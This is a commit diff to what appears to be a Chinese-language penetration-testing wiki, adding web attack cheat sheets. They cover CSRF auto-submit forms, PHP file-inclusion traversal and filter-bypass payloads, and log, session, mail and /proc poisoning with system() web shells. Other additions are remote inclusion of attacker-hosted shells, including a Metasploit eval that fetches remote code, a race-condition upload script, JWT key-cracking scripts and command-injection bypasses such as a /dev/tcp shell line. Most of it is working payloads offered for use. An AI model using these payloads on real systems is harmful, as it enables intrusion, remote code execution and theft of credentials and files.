update

wiki/初始访问/Web服务突破/CSRF.md

@@ -2,4 +2,47 @@
 	查看header中referer,origin参数，删掉后是否返回正常
 	使用csrftester/burpsuite生成表单，以另一账号和浏览器打开测试
 	去掉referer中域名后面的文件夹或文件
-	替换二级域名
+	替换二级域名
+  #### GET需要用户交互
+  	<a href="http://www.example.com/api/setusername?username=CSRFd">Click Me</a>
+  #### GET无用户交互
+  	<img src="http://www.example.com/api/setusername?username=CSRFd">
+  #### POST需要用户交互
+  	<form action="http://www.example.com/api/setusername" enctype="text/plain" method="POST">
+	 <input name="username" type="hidden" value="CSRFd" />
+	 <input type="submit" value="Submit Request" />
+	</form>
+  #### POST无用户交互
+	<form id="autosubmit" action="http://www.example.com/api/setusername" enctype="text/plain" method="POST">
+	 <input name="username" type="hidden" value="CSRFd" />
+	 <input type="submit" value="Submit Request" />
+	</form>
+	 
+	<script>
+	 document.getElementById("autosubmit").submit();
+	</script>
+  #### JSON GET
+	<script>
+	var xhr = new XMLHttpRequest();
+	xhr.open("GET", "http://www.example.com/api/currentuser");
+	xhr.send();
+	</script>
+  #### JSON POST
+	<script>
+	var xhr = new XMLHttpRequest();
+	xhr.open("POST", "http://www.example.com/api/setrole");
+	//application/json is not allowed in a simple request. text/plain is the default
+	xhr.setRequestHeader("Content-Type", "text/plain");
+	//You will probably want to also try one or both of these
+	//xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
+	//xhr.setRequestHeader("Content-Type", "multipart/form-data");
+	xhr.send('{"role":admin}');
+	</script>
+
+	<script>
+	var xhr = new XMLHttpRequest();
+	xhr.open("POST", "http://www.example.com/api/setrole");
+	xhr.withCredentials = true;
+	xhr.setRequestHeader("Content-Type", "application/json;charset=UTF-8");
+	xhr.send('{"role":admin}');
+	</script>

wiki/初始访问/Web服务突破/PHP包含下载读取.md

@@ -1,4 +1,4 @@
-### php任意文件读取/下载
+  ### php任意文件读取/下载
 	readfile()、file_get_contents()、fopen()等读文件的函数不严谨，读取文件路径可控，输出内容。
 	下载配置文件
 	Redis、Weblogic、ftp、mysql、web配置文件、history文件、数据库配置文件
@@ -7,7 +7,7 @@
 	/1.php?f=../../etc/passwd
 	/1.php?f=file:///etc/passwd(file://绕过../的防护)
 	/1.php?f=file:///etc/passwd
-### php文件包含
+  ### php文件包含
   #### 函数:
 	include
 	require
@@ -18,17 +18,52 @@
 	file协议的工作目录是当前目录，使用file:///wwwroot/1.php等同于./wwwroot/1.php可用于绕过一些情况
 	php:// — 访问各个输入/输出流（I/O streams）
 ![image](https://raw.githubusercontent.com/xiaoy-sec/Pentest_Note/master/img/3.png)
-
-	读取
-	/1.php?file=php://filter/read=convert.base64-encode/resource=./1.php
-	写入
+  #### LFI
+  ##### 正常包含
+	index.php?page=../../../etc/passwd
+  ##### 空字节
+	index.php?page=../../../etc/passwd%00
+  ##### 双重编码
+	index.php?page=%252e%252e%252fetc%252fpasswd
+	index.php?page=%252e%252e%252fetc%252fpasswd%00
+  ##### UTF-8 编码
+	index.php?page=%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd
+	index.php?page=%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd%00
+  ##### 路径和点截断
+	index.php?page=../../../etc/passwd............[ADD MORE]
+	index.php?page=../../../etc/passwd\.\.\.\.\.\.[ADD MORE]
+	index.php?page=../../../etc/passwd/./././././.[ADD MORE] 
+	index.php?page=../../../[ADD MORE]../../../../etc/passwd
+  ##### 过滤绕过技巧
+	index.php?page=....//....//etc/passwd
+	index.php?page=..///////..////..//////etc/passwd
+	index.php?page=/%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../etc/passwd
+  ##### 读文件
+	1.php?file=php://filter/read=convert.base64-encode/resource=./1.php
+	1.php?file=pHp://FilTer/convert.base64-encode/resource=index.php
+	1.php?file=php://filter/read=string.rot13/resource=index.php
+	1.php?file=php://filter/zlib.deflate/convert.base64-encode/resource=/etc/passwd
+  ##### 写文件
 	/1.php?file=php://filter/write=convert.base64-decode/resource=[file]","base64
   #### Getshell
 	https://github.com/D35m0nd142/LFISuite
+
+	echo "<pre><?php system($_GET['cmd']); ?></pre>" > payload.php;  
+	zip payload.zip payload.php;
+	mv payload.zip shell.jpg;
+	rm payload.php
+	http://example.com/index.php?page=zip://shell.jpg%23payload.php
+
+	http://example.net/?page=data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWydjbWQnXSk7ZWNobyAnU2hlbGwgZG9uZSAhJzsgPz4=
+  #### expect
+  	http://example.com/index.php?page=expect://id
+	http://example.com/index.php?page=expect://ls
   #### allow_url_include 开启时Getshell
 	远程文件包含
-	/1.php?file=http://remote.com/shell.txt
-	/1.php?file=php://input  POST:<?php phpinfo();?>
+	1.php?file=http://remote.com/shell.txt
+	1.php?file=php://input  POST:<?php phpinfo();?>
+	1.php?file=http://remote.com/shell.txt%00
+	1.php?file=http:%252f%252fremote.com%252fshell.txt
 	或使用curl
 	>curl -v "http://127.0.0.1:8888/ctf/cli/3.php?file=php://input" -d "<?php phpinfo();?>"
 	或使用data://协议解析base64的代码
@@ -51,6 +86,22 @@
 	请求/<?php phpinfo();?>
 	包含错误日志
 	/1.php?file=C:\phpStudy\Apache\logs\error.log
+
+	$ curl http://example.org/ -A "<?php system(\$_GET['cmd']);?>"
+	$ curl http://example.org/test.php?page=/var/log/apache2/access.log&cmd=id
+
+	http://example.com/index.php?page=/var/log/apache/access.log
+	http://example.com/index.php?page=/var/log/apache/error.log
+	http://example.com/index.php?page=/var/log/apache2/access.log
+	http://example.com/index.php?page=/var/log/apache2/error.log
+	http://example.com/index.php?page=/var/log/nginx/access.log
+	http://example.com/index.php?page=/var/log/nginx/error.log
+	http://example.com/index.php?page=/var/log/vsftpd.log
+	http://example.com/index.php?page=/var/log/sshd.log
+	http://example.com/index.php?page=/var/log/mail
+	http://example.com/index.php?page=/var/log/httpd/error_log
+	http://example.com/index.php?page=/usr/local/apache/log/error_log
+	http://example.com/index.php?page=/usr/local/apache2/log/error_log
   #### 上传个图片格式的木马直接包含
 	/1.php?file=/uploadfile/1.jpg
   #### 限制后缀时
@@ -99,9 +150,35 @@
 	session.upload_progress.enabled启用时，文件上传会产生进度文件
 	/var/lib/php5/sess_
 	/var/lib/php/sess_
+
+	Set-Cookie: PHPSESSID=i56kgbsq9rm8ndg3qbarhsbm27; path=/
+	Set-Cookie: user=admin; expires=Mon, 13-Aug-2018 20:21:29 GMT; path=/; httponly
+	将cookie设置为<?php system('cat /etc/passwd');?>
+	包含文件/var/lib/php5/sess_i56kgbsq9rm8ndg3qbarhsbm27
   #### LFI SSH Log
 	>ssh '<?php system($_GET['c']); ?>'@192.168.0.107
+	>ssh <?php system($_GET["cmd"]);?>@10.10.10.10
 	>http://192.168.0.107/lfi.php?file=/var/log/auth.log&c=ls
+  #### 邮件包含
+  	root@kali:~# telnet 10.10.10.10. 25
+	Trying 10.10.10.10....
+	Connected to 10.10.10.10..
+	Escape character is '^]'.
+	220 straylight ESMTP Postfix (Debian/GNU)
+	helo ok
+	250 straylight
+	mail from: [email protected]
+	250 2.1.0 Ok
+	rcpt to: root
+	250 2.1.5 Ok
+	data
+	354 End data with <CR><LF>.<CR><LF>
+	subject: <?php echo system($_GET["cmd"]); ?>
+	data2
+	.
+	包含文件
+	http://example.com/index.php?page=/var/log/mail
+
   #### RFI&命令注入上线MSF
 	MSF生成
 	#use exploit/multi/script/web_delivery
@@ -110,3 +187,37 @@
 	php -d allow_url_fopen=true -r "eval(file_get_contents('http://192.168.0.107:1234/OgsOFaj3yKH'));"
 	RFI：
 	http://www.xx.com/file=http://192.168.0.107:1234/OgsOFaj3yKH
+  #### 通过 /proc/*/fd LFI 到 RCE
+	上传大量的shell（例如：100）
+	http://example.com/index.php?page=/proc/$PID/fd/$FD，其中 $PID = 进程的 PID（可以被暴力破解）和 $FD 文件描述符（也可以被暴力破解）
+  #### 通过 /proc/self/environ LFI 到 RCE
+  	像日志文件一样，在User-Agent中发送payload，会体现在/proc/self/environ文件里面
+
+	GET vulnerable.php?filename=../../../proc/self/environ HTTP/1.1
+	User-Agent: <?=phpinfo(); ?>
+  #### 通过上传完成LFI到RCE
+```python
+import itertools
+import requests
+import sys
+
+print('[+] Trying to win the race')
+f = {'file': open('shell.php', 'rb')}
+for _ in range(4096 * 4096):
+    requests.post('http://target.com/index.php?c=index.php', f)
+
+
+print('[+] Bruteforcing the inclusion')
+for fname in itertools.combinations(string.ascii_letters + string.digits, 6):
+    url = 'http://target.com/index.php?c=/tmp/php' + fname
+    r = requests.get(url)
+    if 'load average' in r.text:  # <?php echo system('uptime');
+        print('[+] We have got a shell: ' + url)
+        sys.exit(0)
+
+print('[x] Something went wrong, please try again')
+```
+  #### 工具
+  	https://github.com/P0cL4bs/Kadimus
+	https://github.com/kurobeats/fimap
+	https://github.com/lightos/Panoptic

wiki/初始访问/Web服务突破/前端.md

@@ -22,6 +22,11 @@
     	10．通过越权修改他人的找回信息如手机/邮箱来重置 
 ### JWT攻击手法
   	https://jwt.io/#debugger-io
+	http://jsonwebtoken.io
+	eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkFtYXppbmcgSGF4eDByIiwiZXhwIjoiMTQ2NjI3MDcyMiIsImFkbWluIjp0cnVlfQ.UL9Pz5HbaMdZCV9cS9OcpccjrlkcmLovL2A2aiKiAOY
+	eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9        # header
+	eyJzdWIiOiIxMjM0[...]kbWluIjp0cnVlfQ        # payload
+	UL9Pz5HbaMdZCV9cS9OcpccjrlkcmLovL2A2aiKiAOY # signature
   #### 未校验签名
   	将原JWT串解码后修改用户名等身份认证的地方，生成新token发送请求
   #### 禁用哈希
@@ -35,22 +40,39 @@ jwt.encode({'user':'admin','arg1':'value1','arg2':'value2'},algorithm='none',key
     >pip3 install pyjwt
     >python3 crack.py
 ```python
-    import jwt
-    import termcolor
+import jwt
+import termcolor
 
-    jwt_str = R'token'
-    with open('/root/password.txt') as f:
-      for line in f:
-      key_ = line.strip()
-      try:
-        jwt.decode(jwt_str,verify=True,key=key_)
-        print('\r','\bfound key -->',termcolor.colored(key_,'green'),'<--')
-        break
-      except(jwt.exceptions.ExpiredSignatureError,jwt.exceptions.InvalidAudienceError,jwt.exceptions.InvalidIssuedAtError,jwt.exceptions.InvalidIssuedAtError,jwt.exceptions.ImmatureSignatureError):
-        print('\r','\bfound key -->',termcolor.colored(key_,'green'),'<--')
-      except jwt.exceptions.InvalidSignatureError:
-        print('\r',' ' * 64, '\r\btry',key_,end='',flush=True)
-        continue
-    else:
-      print('\r','\bnot found.')
-```
+jwt_str = R'token'
+with open('/root/password.txt') as f:
+  for line in f:
+  key_ = line.strip()
+  try:
+    jwt.decode(jwt_str,verify=True,key=key_)
+    print('\r','\bfound key -->',termcolor.colored(key_,'green'),'<--')
+    break
+  except(jwt.exceptions.ExpiredSignatureError,jwt.exceptions.InvalidAudienceError,jwt.exceptions.InvalidIssuedAtError,jwt.exceptions.InvalidIssuedAtError,jwt.exceptions.ImmatureSignatureError):
+    print('\r','\bfound key -->',termcolor.colored(key_,'green'),'<--')
+  except jwt.exceptions.InvalidSignatureError:
+    print('\r',' ' * 64, '\r\btry',key_,end='',flush=True)
+    continue
+else:
+  print('\r','\bnot found.')
+```
+```python
+import jwt
+encoded = jwt.encode({'some': 'payload'}, 'secret', algorithm='HS256') # encode with 'secret'
+
+encoded = "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkpvaG4gRG9lIiwiYWRtaW4iOnRydWV9.cAOIAifu3fykvhkHpbuhbvtH807-Z2rI1FS3vX1XMjE"
+jwt.decode(encoded, 'Sn1f', algorithms=['HS256']) # decode with 'Sn1f' as the secret key
+
+# result
+{u'admin': True, u'sub': u'1234567890', u'name': u'John Doe'}
+```  
+  #### jwt_tool
+	git clone https://github.com/ticarpi/jwt_tool
+	python3 -m pip install termcolor cprint pycryptodomex requests
+	python3 jwt_tool.py eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMjM0NTY3ODkwIiwicm9sZSI6InVzZXIiLCJpYXQiOjE1MTYyMzkwMjJ9.1rtMXfvHSjWuH6vXBCaLLJiBghzVrLJpAQ6Dl5qD4YI -d /tmp/wordlist -C
+  #### c-jwt-cracker
+	git clone https://github.com/brendan-rius/c-jwt-cracker
+	./jwtcrack eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkpvaG4gRG9lIiwiYWRtaW4iOnRydWV9.cAOIAifu3fykvhkHpbuhbvtH807-Z2rI1FS3vX1XMjE

wiki/初始访问/Web服务突破/命令注入.md

@@ -5,4 +5,61 @@
     	||
     	;
     	`Command`
-    	$(Command)
+    	$(Command)
+  #### 工具
+  	https://github.com/commixproject/commix
+  #### 绕过 bypass
+  ##### Linux无空格
+	cat</etc/passwd
+	{cat,/etc/passwd}
+	cat$IFS/etc/passwd
+	echo${IFS}"RCE"${IFS}&&cat${IFS}/etc/passwd
+	X=$'uname\x20-a'&&$X
+	sh</dev/tcp/127.0.0.1/4242
+	IFS=,;`cat<<<uname,-a`
+	;ls%09-al%09/home
+  ##### Windows
+	ping%CommonProgramFiles:~10,-18%IP
+	ping%PROGRAMFILES:~10,-5%IP
+  ##### 绕过回车
+	something%0Acat%20/etc/passwd
+	写文件
+	;cat>/tmp/hi<<EOF%0ahello%0aEOF
+	;cat</tmp/hi
+	hello
+  ##### 通过十六进制编码绕过
+  	Linux
+	cat `echo -e "\x2f\x65\x74\x63\x2f\x70\x61\x73\x73\x77\x64"`
+	abc=$'\x2f\x65\x74\x63\x2f\x70\x61\x73\x73\x77\x64';cat $abc
+	`echo $'cat\x20\x2f\x65\x74\x63\x2f\x70\x61\x73\x73\x77\x64'`
+	cat `xxd -r -p <<< 2f6574632f706173737764`
+	cat `xxd -r -ps <(echo 2f6574632f706173737764)`
+  ##### 绕过字符过滤器
+	没有反斜杠和斜杠的命令执行
+	cat ${HOME:0:1}etc${HOME:0:1}passwd
+	cat $(echo . | tr '!-0' '"-1')etc$(echo . | tr '!-0' '"-1')passwd
+  ##### 绕过列入黑名单的词
+  	单引号w'h'o'am'i
+	双引号w"h"o"am"i
+	用反斜杠和斜杠绕过
+	w\ho\am\i
+	/\b\i\n/////s\h
+	使用 $@ 绕过
+	who$@ami
+
+	echo $0
+	-> /usr/bin/zsh
+	echo whoami|$0
+	使用 $() 绕过
+	who$()ami
+	who$(echo am)i
+	who`echo am`i
+	使用变量扩展绕过
+	/???/??t /???/p??s??
+
+	test=/ehhh/hmtc/pahhh/hmsswd
+	cat ${test//hhh\/hm/}
+	cat ${test//hh??hm/}
+	使用通配符绕过
+	powershell C:\*\*2\n??e*d.*? # notepad
+	@^p^o^w^e^r^shell c:\*\*32\c*?c.e?e # calc